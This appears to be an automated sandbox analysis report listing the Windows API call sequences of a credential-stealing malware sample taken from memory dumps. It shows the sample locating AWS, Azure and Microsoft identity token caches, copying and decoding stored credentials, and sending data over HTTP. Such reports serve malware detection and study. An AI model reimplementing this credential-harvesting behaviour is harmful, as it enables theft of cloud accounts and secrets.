                                      • LoadLibraryA.KERNEL32(0064A550,?,00926C67), ref: 00929D01
                                      • LoadLibraryA.KERNEL32(0064A17C,?,00926C67), ref: 00929D12
                                      • LoadLibraryA.KERNEL32(0064A104,?,00926C67), ref: 00929D24
                                      • LoadLibraryA.KERNEL32(0064A1DC,?,00926C67), ref: 00929D36
                                      • LoadLibraryA.KERNEL32(0064A328,?,00926C67), ref: 00929D47
                                      • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 00929D69
                                      • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 00929D8A
                                      • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 00929DA2
                                      • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 00929DC4
                                      • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 00929DE5
                                      • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 00929E06
                                      • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 00929E1D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID:
                                      • API String ID: 2238633743-0
                                      • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction ID: 4f86d62735e6b116a0c9870af734f912f1bd56127427f6dabb9d051b5b026be0
                                      • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction Fuzzy Hash: 12A12BBD5C0240BFE364EFE8ED889A63BFBF74A301714661AF605C3264D6399841DB52
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 00929047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00929072
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 00919C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00919C53
                                        • Part of subcall function 00919C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919C78
                                        • Part of subcall function 00919C27: LocalAlloc.KERNEL32(00000040,?), ref: 00919C98
                                        • Part of subcall function 00919C27: ReadFile.KERNEL32(000000FF,?,00000000,009116F6,00000000), ref: 00919CC1
                                        • Part of subcall function 00919C27: LocalFree.KERNEL32(009116F6), ref: 00919CF7
                                        • Part of subcall function 00919C27: CloseHandle.KERNEL32(000000FF), ref: 00919D01
                                        • Part of subcall function 00929097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009290B9
                                      • strtok_s.MSVCRT ref: 00920582
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 009205C9
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009205D0
                                      • StrStrA.SHLWAPI(00000000,00421618), ref: 009205EC
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 009205FA
                                        • Part of subcall function 00928B47: malloc.MSVCRT ref: 00928B4F
                                        • Part of subcall function 00928B47: strncpy.MSVCRT ref: 00928B6A
                                      • StrStrA.SHLWAPI(00000000,00421620), ref: 00920636
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00920644
                                      • StrStrA.SHLWAPI(00000000,00421628), ref: 00920680
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0092068E
                                      • StrStrA.SHLWAPI(00000000,00421630), ref: 009206CA
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 009206DC
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00920769
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00920781
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00920799
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 009207B1
                                      • lstrcat.KERNEL32(?,0042164C), ref: 009207C9
                                      • lstrcat.KERNEL32(?,00421660), ref: 009207D8
                                      • lstrcat.KERNEL32(?,00421670), ref: 009207E7
                                      • lstrcat.KERNEL32(?,00000000), ref: 009207FA
                                      • lstrcat.KERNEL32(?,00421678), ref: 00920809
                                      • lstrcat.KERNEL32(?,00000000), ref: 0092081C
                                      • lstrcat.KERNEL32(?,0042167C), ref: 0092082B
                                      • lstrcat.KERNEL32(?,00421680), ref: 0092083A
                                      • lstrcat.KERNEL32(?,00000000), ref: 0092084D
                                      • lstrcat.KERNEL32(?,00421688), ref: 0092085C
                                      • lstrcat.KERNEL32(?,0042168C), ref: 0092086B
                                      • lstrcat.KERNEL32(?,00000000), ref: 0092087E
                                      • lstrcat.KERNEL32(?,00421698), ref: 0092088D
                                      • lstrcat.KERNEL32(?,0042169C), ref: 0092089C
                                      • strtok_s.MSVCRT ref: 009208E0
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 009208F5
                                      • memset.MSVCRT ref: 00920944
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                      • String ID:
                                      • API String ID: 3689735781-0
                                      • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                      • Instruction ID: 9c306a49ffd0371427d1444ac67826c3d64f73f44c64485215b308589360a98d
                                      • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                      • Instruction Fuzzy Hash: A9D15E76A40228EFCB04FBF0ED96FEE7779AF94700F504519F102A6099DE34AA45CB61
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                      • StrCmpCA.SHLWAPI(?,009DC7A8), ref: 00405A13
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,009DC7E8,00000000,?,009D6848,00000000,?,00421A1C), ref: 00405E71
                                      • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                      • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                      • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                      • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                      • memcpy.MSVCRT(?), ref: 00405EFE
                                      • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                      • HttpOpenRequestA.WININET(00000000,009DC718,?,009DC178,00000000,00000000,00400100,00000000), ref: 00405BF8
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 1406981993-2180234286
                                      • Opcode ID: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                      • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                      • Opcode Fuzzy Hash: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                      • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                      APIs
                                      • memset.MSVCRT ref: 00414D87
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • memset.MSVCRT ref: 00414E13
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                      • memset.MSVCRT ref: 00414E9F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                        • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,009DC808,?,000003E8), ref: 00414A4A
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                        • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                        • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                      • memset.MSVCRT ref: 00414F2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                      • API String ID: 4017274736-156832076
                                      • Opcode ID: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                      • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                      • Opcode Fuzzy Hash: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                      • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 00928DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00911660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00928DED
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091D1EA
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0091D32E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0091D335
                                      • lstrcat.KERNEL32(?,00000000), ref: 0091D46F
                                      • lstrcat.KERNEL32(?,00421478), ref: 0091D47E
                                      • lstrcat.KERNEL32(?,00000000), ref: 0091D491
                                      • lstrcat.KERNEL32(?,0042147C), ref: 0091D4A0
                                      • lstrcat.KERNEL32(?,00000000), ref: 0091D4B3
                                      • lstrcat.KERNEL32(?,00421480), ref: 0091D4C2
                                      • lstrcat.KERNEL32(?,00000000), ref: 0091D4D5
                                      • lstrcat.KERNEL32(?,00421484), ref: 0091D4E4
                                      • lstrcat.KERNEL32(?,00000000), ref: 0091D4F7
                                      • lstrcat.KERNEL32(?,00421488), ref: 0091D506
                                      • lstrcat.KERNEL32(?,00000000), ref: 0091D519
                                      • lstrcat.KERNEL32(?,0042148C), ref: 0091D528
                                      • lstrcat.KERNEL32(?,00000000), ref: 0091D53B
                                      • lstrcat.KERNEL32(?,00421490), ref: 0091D54A
                                        • Part of subcall function 0092AA87: lstrlen.KERNEL32(0091516C,?,?,0091516C,00420DDE), ref: 0092AA92
                                        • Part of subcall function 0092AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0092AAEC
                                      • lstrlen.KERNEL32(?), ref: 0091D591
                                      • lstrlen.KERNEL32(?), ref: 0091D5A0
                                      • memset.MSVCRT ref: 0091D5EF
                                        • Part of subcall function 0092ACD7: StrCmpCA.SHLWAPI(0064A350,0091AA0E,?,0091AA0E,0064A350), ref: 0092ACF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 0091D61B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                      • String ID:
                                      • API String ID: 1973479514-0
                                      • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                      • Instruction ID: 889777e2e2794f79d0f386bab54cf0b90174bda5a125e3069a91e661080db30f
                                      • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                      • Instruction Fuzzy Hash: 59E15E76940128EFCB04FBE0ED96EEE737AAF94701F504159F106A20A5DE35AE44CF62
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,009D6878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                      • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                      • lstrcatA.KERNEL32(?,00000000,009A95F0,00421474,009A95F0,00421470,00000000), ref: 0040D208
                                      • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                      • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                      • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                      • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                      • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                      • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                      • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009A94C0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      • lstrlenA.KERNEL32(?), ref: 0040D32A
                                      • lstrlenA.KERNEL32(?), ref: 0040D339
                                      • memset.MSVCRT ref: 0040D388
                                        • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                      • String ID:
                                      • API String ID: 2775534915-0
                                      • Opcode ID: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                      • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                      • Opcode Fuzzy Hash: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                      • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                      APIs
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A51
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A68
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A7F
                                        • Part of subcall function 00914A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914AA0
                                        • Part of subcall function 00914A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914AB0
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00915C5F
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 00915C7A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00915DFA
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 009160D8
                                      • lstrlen.KERNEL32(00000000), ref: 009160E9
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 009160FA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00916101
                                      • lstrlen.KERNEL32(00000000), ref: 00916116
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 0091612D
                                      • lstrlen.KERNEL32(00000000), ref: 0091613F
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00916158
                                      • memcpy.MSVCRT(?), ref: 00916165
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00916182
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00916196
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 009161B3
                                      • InternetCloseHandle.WININET(00000000), ref: 00916217
                                      • InternetCloseHandle.WININET(00000000), ref: 00916224
                                      • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00915E5F
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                      • InternetCloseHandle.WININET(00000000), ref: 0091622E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                      • String ID:
                                      • API String ID: 1703137719-0
                                      • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                      • Instruction ID: c7c536e716ae568a033dc3128d88f140060d01e91081316a7645109da820f920
                                      • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                      • Instruction Fuzzy Hash: 1D12ED76920228EFCB15EBA0ED95FEEB379BF54700F404199B146A2095EF702B88CF55
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 0091CCD3
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0091CCF0
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0091CCFC
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0091CD0F
                                      • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0091CD1C
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0091CD40
                                      • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 0091CD5E
                                      • StrStrA.SHLWAPI(00000000,0064A364), ref: 0091CD85
                                      • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 0091CF09
                                      • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 0091CF20
                                        • Part of subcall function 0091CA87: memset.MSVCRT ref: 0091CABA
                                        • Part of subcall function 0091CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0091CAD8
                                        • Part of subcall function 0091CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0091CAE3
                                        • Part of subcall function 0091CA87: memcpy.MSVCRT(?,?,?), ref: 0091CB79
                                      • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 0091CFC1
                                      • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 0091CFD8
                                        • Part of subcall function 0091CA87: lstrcat.KERNEL32(?,00420B46), ref: 0091CBAA
                                        • Part of subcall function 0091CA87: lstrcat.KERNEL32(?,00420B47), ref: 0091CBBE
                                        • Part of subcall function 0091CA87: lstrcat.KERNEL32(?,00420B4E), ref: 0091CBDF
                                      • lstrlen.KERNEL32(00000000), ref: 0091D0AB
